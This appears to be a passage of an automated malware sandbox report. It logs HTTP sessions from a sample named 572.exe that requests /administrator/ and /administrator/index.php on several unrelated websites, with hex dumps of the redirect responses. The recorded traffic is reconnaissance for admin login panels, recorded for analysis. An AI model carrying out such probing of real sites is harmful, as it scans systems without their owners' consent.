                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 32 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 32 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.061831951 CET117INData Raw: 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6d 6f 76 65 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.061846972 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                176192.168.2.655365104.22.43.15880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.916166067 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: casinocontroller.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.252774954 CET530INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.casinocontroller.com/admin/istrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6c88bd17f3-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 73 69 6e 6f 63 6f 6e 74 72 6f 6c 6c 65 72 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.casinocontroller.com/admin/istrator/">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.252790928 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.923698902 CET193OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: casinocontroller.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.249514103 CET548INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.casinocontroller.com/admin/istrator/index.php
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abbab1b0017f3-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 66 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 73 69 6e 6f 63 6f 6e 74 72 6f 6c 6c 65 72 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: f1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.casinocontroller.com/admin/istrator/index.php">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.249535084 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                177192.168.2.65539323.4.32.21680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.077855110 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.184674025 CET188INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://steamcommunity.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.438123941 CET191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.544514894 CET197INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://steamcommunity.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                178192.168.2.65520131.13.65.180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.077856064 CET180OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.179819107 CET214INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://web.facebook.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.371506929 CET189OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.473505974 CET218INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://web.facebook.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                179192.168.2.65509734.250.93.11280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.077856064 CET171OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: kwyk.fr
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.281100988 CET412INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.kwyk.fr/administrator/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.922085047 CET180OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: kwyk.fr
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.125452042 CET421INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.kwyk.fr/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                180192.168.2.655200162.241.203.3080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.077878952 CET178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.319349051 CET226INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                181192.168.2.6552043.161.150.8980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.077975035 CET183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.179802895 CET583INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 4a033384071e0f101ee5d0d0aaf707c2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 9WsE6-0b3UxSMASMzXZR0p-sD-HeMVwsZPC5-jHFbEDkEpi0SfXszQ==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:05.914650917 CET192OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.016349077 CET592INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 4a033384071e0f101ee5d0d0aaf707c2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: D79l7LkKzRzZR9PWKhRiabhawB01zH_LLrPBotwUjxLevDmmFKSUbw==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                182192.168.2.65506782.221.28.17180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.077975035 CET169OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: uh.is
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.316490889 CET532INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=60
                                                                                                                                                                                                                                                                                                                                                                Location: https://uh.is/administrator/
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
